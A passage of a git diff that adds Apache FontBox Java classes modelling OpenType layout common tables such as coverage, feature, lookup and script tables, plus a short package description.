b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTable.java", - "new file mode 100644", - "index 000000000..8dcb5a271", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTable.java", - "@@ -0,0 +1,48 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.common;", - "+", - "+/**", - "+ * This class models the", - "+ * Coverage Table in the", - "+ * Open Type layout common tables.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public abstract class CoverageTable", - "+{", - "+ private final int coverageFormat;", - "+", - "+ public CoverageTable(int coverageFormat)", - "+ {", - "+ this.coverageFormat = coverageFormat;", - "+ }", - "+", - "+ public abstract int getCoverageIndex(int gid);", - "+", - "+ public abstract int getGlyphId(int index);", - "+", - "+ public abstract int getSize();", - "+", - "+ public int getCoverageFormat()", - "+ {", - "+ return coverageFormat;", - "+ }", - "+", - "+}", - "\\ No newline at end of file", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTableFormat1.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTableFormat1.java", - "new file mode 100644", - "index 000000000..7d3888403", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTableFormat1.java", - "@@ -0,0 +1,72 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.common;", - "+", - "+import java.util.Arrays;", - "+", - "+/**", - "+ * This class models the", - "+ * Coverage format 1", - "+ * in the Open Type layout common tables.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class CoverageTableFormat1 extends CoverageTable", - "+{", - "+", - "+ private final int[] glyphArray;", - "+", - "+ public CoverageTableFormat1(int coverageFormat, int[] glyphArray)", - "+ {", - "+ super(coverageFormat);", - "+ this.glyphArray = glyphArray;", - "+ }", - "+", - "+ @Override", - "+ public int getCoverageIndex(int gid)", - "+ {", - "+ return Arrays.binarySearch(glyphArray, gid);", - "+ }", - "+", - "+ @Override", - "+ public int getGlyphId(int index)", - "+ {", - "+ return glyphArray[index];", - "+ }", - "+", - "+ @Override", - "+ public int getSize()", - "+ {", - "+ return glyphArray.length;", - "+ }", - "+", - "+ public int[] getGlyphArray()", - "+ {", - "+ return glyphArray;", - "+ }", - "+", - "+ @Override", - "+ public String toString()", - "+ {", - "+ return String.format(\"CoverageTableFormat1[coverageFormat=%d,glyphArray=%s]\",", - "+ getCoverageFormat(), Arrays.toString(glyphArray));", - "+ }", - "+", - "+", - "+}", - "\\ No newline at end of file", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTableFormat2.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTableFormat2.java", - "new file mode 100644", - "index 000000000..2f27b75af", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTableFormat2.java", - "@@ -0,0 +1,75 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.common;", - "+", - "+import java.util.ArrayList;", - "+import java.util.List;", - "+", - "+/**", - "+ * This class models the", - "+ * Coverage format 2", - "+ * in the Open Type layout common tables.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class CoverageTableFormat2 extends CoverageTableFormat1", - "+{", - "+ private final RangeRecord[] rangeRecords;", - "+", - "+ public CoverageTableFormat2(int coverageFormat, RangeRecord[] rangeRecords)", - "+ {", - "+ super(coverageFormat, getRangeRecordsAsArray(rangeRecords));", - "+ this.rangeRecords = rangeRecords;", - "+ }", - "+", - "+ public RangeRecord[] getRangeRecords()", - "+ {", - "+ return rangeRecords;", - "+ }", - "+", - "+ private static int[] getRangeRecordsAsArray(RangeRecord[] rangeRecords)", - "+ {", - "+", - "+ List glyphIds = new ArrayList<>();", - "+", - "+ for (int i = 0; i < rangeRecords.length; i++)", - "+ {", - "+ for (int glyphId = rangeRecords[i].getStartGlyphID(); glyphId <= rangeRecords[i]", - "+ .getEndGlyphID(); glyphId++)", - "+ {", - "+ glyphIds.add(glyphId);", - "+ }", - "+ }", - "+", - "+ int[] glyphArray = new int[glyphIds.size()];", - "+", - "+ for (int i = 0; i < glyphArray.length; i++)", - "+ {", - "+ glyphArray[i] = glyphIds.get(i);", - "+ }", - "+", - "+ return glyphArray;", - "+ }", - "+", - "+ @Override", - "+ public String toString()", - "+ {", - "+ return String.format(\"CoverageTableFormat2[coverageFormat=%d]\", getCoverageFormat());", - "+ }", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureListTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureListTable.java", - "new file mode 100644", - "index 000000000..0f05d8eea", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureListTable.java", - "@@ -0,0 +1,56 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.common;", - "+", - "+/**", - "+ * This class models the", - "+ * Feature List", - "+ * table in the Open Type layout common tables.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class FeatureListTable", - "+{", - "+ private final int featureCount;", - "+ private final FeatureRecord[] featureRecords;", - "+", - "+ public FeatureListTable(int featureCount, FeatureRecord[] featureRecords)", - "+ {", - "+ this.featureCount = featureCount;", - "+ this.featureRecords = featureRecords;", - "+ }", - "+", - "+ public int getFeatureCount()", - "+ {", - "+ return featureCount;", - "+ }", - "+", - "+ public FeatureRecord[] getFeatureRecords()", - "+ {", - "+ return featureRecords;", - "+ }", - "+", - "+", - "+ @Override", - "+ public String toString()", - "+ {", - "+ return String.format(\"%s[featureCount=%d]\", FeatureListTable.class.getSimpleName(),", - "+ featureCount);", - "+ }", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureRecord.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureRecord.java", - "new file mode 100644", - "index 000000000..b6e9c609e", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureRecord.java", - "@@ -0,0 +1,54 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.common;", - "+", - "+/**", - "+ * This class models the", - "+ * Features and", - "+ * lookups in the Open Type layout common tables.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class FeatureRecord", - "+{", - "+ private final String featureTag;", - "+ private final FeatureTable featureTable;", - "+", - "+ public FeatureRecord(String featureTag, FeatureTable featureTable)", - "+ {", - "+ this.featureTag = featureTag;", - "+ this.featureTable = featureTable;", - "+ }", - "+", - "+ public String getFeatureTag()", - "+ {", - "+ return featureTag;", - "+ }", - "+", - "+ public FeatureTable getFeatureTable()", - "+ {", - "+ return featureTable;", - "+ }", - "+", - "+ @Override", - "+ public String toString()", - "+ {", - "+ return String.format(\"FeatureRecord[featureTag=%s]\", featureTag);", - "+ }", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureTable.java", - "new file mode 100644", - "index 000000000..56101cd48", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureTable.java", - "@@ -0,0 +1,61 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.common;", - "+", - "+/**", - "+ * This class models the", - "+ * Feature table in the", - "+ * Open Type layout common tables.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class FeatureTable", - "+{", - "+ private final int featureParams;", - "+ private final int lookupIndexCount;", - "+ private final int[] lookupListIndices;", - "+", - "+ public FeatureTable(int featureParams, int lookupIndexCount, int[] lookupListIndices)", - "+ {", - "+ this.featureParams = featureParams;", - "+ this.lookupIndexCount = lookupIndexCount;", - "+ this.lookupListIndices = lookupListIndices;", - "+ }", - "+", - "+ public int getFeatureParams()", - "+ {", - "+ return featureParams;", - "+ }", - "+", - "+ public int getLookupIndexCount()", - "+ {", - "+ return lookupIndexCount;", - "+ }", - "+", - "+ public int[] getLookupListIndices()", - "+ {", - "+ return lookupListIndices;", - "+ }", - "+", - "+ @Override", - "+ public String toString()", - "+ {", - "+ return String.format(\"FeatureTable[lookupListIndiciesCount=%d]\", lookupListIndices.length);", - "+ }", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LangSysRecord.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LangSysRecord.java", - "new file mode 100644", - "index 000000000..04a5fdc32", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LangSysRecord.java", - "@@ -0,0 +1,53 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.common;", - "+", - "+/**", - "+ * This class models the Language", - "+ * system tags in the Open Type Font specs.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class LangSysRecord", - "+{", - "+ private final String langSysTag;", - "+ private final LangSysTable langSysTable;", - "+", - "+ public LangSysRecord(String langSysTag, LangSysTable langSysTable)", - "+ {", - "+ this.langSysTag = langSysTag;", - "+ this.langSysTable = langSysTable;", - "+ }", - "+", - "+ public String getLangSysTag()", - "+ {", - "+ return langSysTag;", - "+ }", - "+", - "+ public LangSysTable getLangSysTable()", - "+ {", - "+ return langSysTable;", - "+ }", - "+", - "+ @Override", - "+ public String toString()", - "+ {", - "+ return String.format(\"LangSysRecord[langSysTag=%s]\", langSysTag);", - "+ }", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LangSysTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LangSysTable.java", - "new file mode 100644", - "index 000000000..9cbe24572", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LangSysTable.java", - "@@ -0,0 +1,68 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.common;", - "+", - "+/**", - "+ * This class models the Language", - "+ * system tags in the Open Type Font specs.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class LangSysTable", - "+{", - "+ private final int lookupOrder;", - "+ private final int requiredFeatureIndex;", - "+ private final int featureIndexCount;", - "+ private final int[] featureIndices;", - "+", - "+ public LangSysTable(int lookupOrder, int requiredFeatureIndex, int featureIndexCount,", - "+ int[] featureIndices)", - "+ {", - "+ this.lookupOrder = lookupOrder;", - "+ this.requiredFeatureIndex = requiredFeatureIndex;", - "+ this.featureIndexCount = featureIndexCount;", - "+ this.featureIndices = featureIndices;", - "+ }", - "+", - "+ public int getLookupOrder()", - "+ {", - "+ return lookupOrder;", - "+ }", - "+", - "+ public int getRequiredFeatureIndex()", - "+ {", - "+ return requiredFeatureIndex;", - "+ }", - "+", - "+ public int getFeatureIndexCount()", - "+ {", - "+ return featureIndexCount;", - "+ }", - "+", - "+ public int[] getFeatureIndices()", - "+ {", - "+ return featureIndices;", - "+ }", - "+", - "+ @Override", - "+ public String toString()", - "+ {", - "+ return String.format(\"LangSysTable[requiredFeatureIndex=%d]\", requiredFeatureIndex);", - "+ }", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupListTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupListTable.java", - "new file mode 100644", - "index 000000000..5a07b4cd4", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupListTable.java", - "@@ -0,0 +1,55 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.common;", - "+", - "+/**", - "+ * This class models the", - "+ * Lookup List Table", - "+ * in the Open Type layout common tables.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class LookupListTable", - "+{", - "+ private final int lookupCount;", - "+ private final LookupTable[] lookups;", - "+", - "+ public LookupListTable(int lookupCount, LookupTable[] lookups)", - "+ {", - "+ this.lookupCount = lookupCount;", - "+ this.lookups = lookups;", - "+ }", - "+", - "+ public int getLookupCount()", - "+ {", - "+ return lookupCount;", - "+ }", - "+", - "+ public LookupTable[] getLookups()", - "+ {", - "+ return lookups;", - "+ }", - "+", - "+ @Override", - "+ public String toString()", - "+ {", - "+ return String.format(\"%s[lookupCount=%d]\", LookupListTable.class.getSimpleName(),", - "+ lookupCount);", - "+ }", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupSubTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupSubTable.java", - "new file mode 100644", - "index 000000000..3d090fe04", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupSubTable.java", - "@@ -0,0 +1,50 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.common;", - "+", - "+/**", - "+ * This class models the", - "+ * Lookup Sub-Table in the", - "+ * Open Type layout common tables.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public abstract class LookupSubTable", - "+{", - "+ private final int substFormat;", - "+ private final CoverageTable coverageTable;", - "+", - "+ public LookupSubTable(int substFormat, CoverageTable coverageTable)", - "+ {", - "+ this.substFormat = substFormat;", - "+ this.coverageTable = coverageTable;", - "+ }", - "+", - "+ public abstract int doSubstitution(int gid, int coverageIndex);", - "+", - "+ public int getSubstFormat()", - "+ {", - "+ return substFormat;", - "+ }", - "+", - "+ public CoverageTable getCoverageTable()", - "+ {", - "+ return coverageTable;", - "+ }", - "+}", - "\\ No newline at end of file", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupTable.java", - "new file mode 100644", - "index 000000000..1f7dc29ef", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupTable.java", - "@@ -0,0 +1,70 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.common;", - "+", - "+/**", - "+ * This class models the", - "+ * Lookup Table in the", - "+ * Open Type layout common tables.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class LookupTable", - "+{", - "+ private final int lookupType;", - "+ private final int lookupFlag;", - "+ private final int markFilteringSet;", - "+ private final LookupSubTable[] subTables;", - "+", - "+ public LookupTable(int lookupType, int lookupFlag, int markFilteringSet,", - "+ LookupSubTable[] subTables)", - "+ {", - "+ this.lookupType = lookupType;", - "+ this.lookupFlag = lookupFlag;", - "+ this.markFilteringSet = markFilteringSet;", - "+ this.subTables = subTables;", - "+ }", - "+", - "+ public int getLookupType()", - "+ {", - "+ return lookupType;", - "+ }", - "+", - "+ public int getLookupFlag()", - "+ {", - "+ return lookupFlag;", - "+ }", - "+", - "+ public int getMarkFilteringSet()", - "+ {", - "+ return markFilteringSet;", - "+ }", - "+", - "+ public LookupSubTable[] getSubTables()", - "+ {", - "+ return subTables;", - "+ }", - "+", - "+ @Override", - "+ public String toString()", - "+ {", - "+ return String.format(\"LookupTable[lookupType=%d,lookupFlag=%d,markFilteringSet=%d]\",", - "+ lookupType, lookupFlag, markFilteringSet);", - "+ }", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/RangeRecord.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/RangeRecord.java", - "new file mode 100644", - "index 000000000..8e3740399", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/RangeRecord.java", - "@@ -0,0 +1,62 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.common;", - "+", - "+/**", - "+ * This class models the", - "+ * Range Record in the", - "+ * Coverage format 2 in the Open Type layout common tables.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class RangeRecord", - "+{", - "+ private final int startGlyphID;", - "+ private final int endGlyphID;", - "+ private final int startCoverageIndex;", - "+", - "+ public RangeRecord(int startGlyphID, int endGlyphID, int startCoverageIndex)", - "+ {", - "+ this.startGlyphID = startGlyphID;", - "+ this.endGlyphID = endGlyphID;", - "+ this.startCoverageIndex = startCoverageIndex;", - "+ }", - "+", - "+ public int getStartGlyphID()", - "+ {", - "+ return startGlyphID;", - "+ }", - "+", - "+ public int getEndGlyphID()", - "+ {", - "+ return endGlyphID;", - "+ }", - "+", - "+ public int getStartCoverageIndex()", - "+ {", - "+ return startCoverageIndex;", - "+ }", - "+", - "+ @Override", - "+ public String toString()", - "+ {", - "+ return String.format(\"RangeRecord[startGlyphID=%d,endGlyphID=%d,startCoverageIndex=%d]\",", - "+ startGlyphID, endGlyphID, startCoverageIndex);", - "+ }", - "+}", - "\\ No newline at end of file", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/ScriptRecord.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/ScriptRecord.java", - "new file mode 100644", - "index 000000000..e8524ef32", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/ScriptRecord.java", - "@@ -0,0 +1,53 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.common;", - "+", - "+/**", - "+ * This class models the Script tags", - "+ * in the Open Type Font specs.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class ScriptRecord", - "+{", - "+ private final String scriptTag;", - "+ private final ScriptTable scriptTable;", - "+", - "+ public ScriptRecord(String scriptTag, ScriptTable scriptTable)", - "+ {", - "+ this.scriptTag = scriptTag;", - "+ this.scriptTable = scriptTable;", - "+ }", - "+", - "+ public String getScriptTag()", - "+ {", - "+ return scriptTag;", - "+ }", - "+", - "+ public ScriptTable getScriptTable()", - "+ {", - "+ return scriptTable;", - "+ }", - "+", - "+ @Override", - "+ public String toString()", - "+ {", - "+ return String.format(\"ScriptRecord[scriptTag=%s]\", scriptTag);", - "+ }", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/ScriptTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/ScriptTable.java", - "new file mode 100644", - "index 000000000..24fe97d9d", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/ScriptTable.java", - "@@ -0,0 +1,56 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.common;", - "+", - "+import java.util.Map;", - "+", - "+/**", - "+ * This class models the Script tags", - "+ * in the Open Type Font specs.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class ScriptTable", - "+{", - "+ private final LangSysTable defaultLangSysTable;", - "+ private final Map langSysTables;", - "+", - "+ public ScriptTable(LangSysTable defaultLangSysTable, Map langSysTables)", - "+ {", - "+ this.defaultLangSysTable = defaultLangSysTable;", - "+ this.langSysTables = langSysTables;", - "+ }", - "+", - "+ public LangSysTable getDefaultLangSysTable()", - "+ {", - "+ return defaultLangSysTable;", - "+ }", - "+", - "+ public Map getLangSysTables()", - "+ {", - "+ return langSysTables;", - "+ }", - "+", - "+ @Override", - "+ public String toString()", - "+ {", - "+ return String.format(\"ScriptTable[hasDefault=%s,langSysRecordsCount=%d]\",", - "+ defaultLangSysTable != null, langSysTables.size());", - "+ }", - "+}", - "\\ No newline at end of file", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/package.html b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/package.html", - "new file mode 100644", - "index 000000000..dce4f43fd", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/package.html", - "@@ -0,0 +1,26 @@", - "+", - "+", - "+", - "+", - "+", - "+", - "+", - "+This package contains the highly obfuscated Layout Common Table Formats system of tables from the Open Type Font specs. ", - "+This package makes an honest attempt to closely model these highly obfuscated OTF Tables, in their raw glory, as close as possible to their original nonsensical forms, without any spite or bias.", - "+", - "+", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LigatureSetTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LigatureSetTable.java", - "new file mode 100644", - "index 000000000..a38443870", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LigatureSetTable.java", - "@@ -0,0 +1,58 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", 